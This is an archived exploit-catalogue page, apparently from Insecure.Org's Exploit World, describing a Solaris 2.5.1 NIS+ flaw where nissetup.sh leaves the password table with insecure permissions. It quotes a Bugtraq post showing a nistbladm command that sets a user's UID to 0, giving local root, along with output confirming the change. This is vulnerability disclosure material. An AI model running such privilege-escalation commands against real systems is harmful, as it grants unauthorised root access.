Insecure Solaris default nissetup password table permissions!
| Description: | The nissetup.sh program for setting up NIS+ databases leaves insecure permissions on the password table. This allows you to, for example, use nistbladm to change your UID! |
| Author: | Well known |
| Compromise: | root (local) |
| Vulnerable Systems: | Unpatched Solaris 2.5.1 systems (possibly earlier versions of Solaris). |
| Date: | 10 February 1996 |
| Notes: | Here is an anonymous posting reminding us of the problem. Also, Casper Dik (casper@HOLLAND.SUN.COM) mentioned that just installing the Solaris patch doesn't fix the problem. You need to manually reset the bad permissions. How many people do you think forgot to do that? |
Date: Fri, 30 May 1997 19:44:40 +0200
From: Anonymous <nobody@REPLAY.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: NIS+, Solaris 2.5.1
Ever tried to change your NIS+ password with
the "nistbladm" command ? Works fine, but you
can also change your UID ....
$ nistbladm -e uid=0 '[name=alice]',passwd.org_dir
$ niscat passwd.org_dir | grep alice
alice:xedvtAgfruijg:0:1001:........
. . . . . . . . . . .
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
